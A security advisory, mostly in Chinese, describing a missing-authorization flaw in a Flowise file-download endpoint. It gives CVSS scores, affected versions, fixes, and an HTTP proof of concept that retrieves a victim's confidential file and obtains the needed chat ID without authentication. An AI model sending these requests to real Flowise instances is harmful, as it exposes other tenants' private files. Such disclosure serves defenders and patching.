漏洞概述 CVE-2026-71962: Unauthenticated Private File Disclosure in Flowise openai-assistants-file/download 漏洞描述: Flowise REST API 的 端点在未进行任何身份验证的情况下提供服务。该端点被列在服务器的全局 中,绕过了会话 cookie 和 API 密钥的身份验证。 漏洞类型: 缺少授权(IDOR 风格授权缺陷) CWE: CWE-862 (Missing Authorization) CVSS 3.1: 7.5 High CVSS 4.0: 8.7 High 报告日期: 2026-08-09 影响范围 受影响版本: - npm : 3.1.4 (最新发布版本,git tag = commit , 2026-07-29) - GitHub main at commit , inspected 2026-08-09 - npm : 2.2.4 - 3.1.3 影响: 未授权的请求者如果知道有效的 元组,可以检索相应的存储文件,而无需任何身份验证或工作空间成员资格检查。 修复方案 修复建议: - 在 处理程序中实施严格的身份验证和授权检查。 - 确保在处理文件下载请求时,验证请求者是否属于拥有目标 chatflow 的工作空间或组织。 - 避免将敏感端点列入全局白名单,除非确实需要绕过身份验证。 Proof of Concept (POC) http GET /api/v1/chatflows/3855de1b-5860-4756-9e77-dac219b62f95 HTTP/1.1 Host: localhost:3000 json {"message": "Invalid or Missing token"} http POST /api/v1/openai-assistants-file/download HTTP/1.1 Host: localhost:3000 Content-Type: application/json Content-Length: 123 {"chatflowId":"3855de1b-5860-4756-9e77-dac219b62f95","chatId":"e2908f3a-victim-chat-01","fileName":"secret-rpt"} http Content-Disposition: attachment; filename="secret-report.txt" Content-Type: text/plain CONFIDENTIAL - Victim workspace uploaded file - should NOT be downloadable without auth http GET /api/v1/feedback/3855de1b-5860-4756-9e77-dac219b62f95 HTTP/1.1 Host: localhost:3000 json [{"id":"...","chatflowId":"3855de1b-...","chatId":"e2908f3a-victim-chat-01","messageId":"...","rating":"THUM"}] 影响 机密性(高): 未经授权披露与私有 chatflows 关联的存储文件,包括属于其他工作空间/组织的资源。 范围: 因为 解析来自提供的 的目标组织/工作空间,而不是来自请求者,租户隔离边界为文件存储提供对此端点上的多租户部署(Flowise Cloud 或自托管实例服务多个组织/工作空间)的无保护。 攻击复杂性: CVSS 理由:一旦目标文件的 元组已知,利用需要恰好一个未授权的 HTTP 请求,没有暴力破解或猜测标识符,没有加密绕过,没有路径遍历或 UUID 验证绕过(第 3.5 节),没有不寻常或罕见的部署条件。第 4.4 节额外表明,三个必需标识符中的一个( )可以以无授权检查的方式获得,无论其如何获得。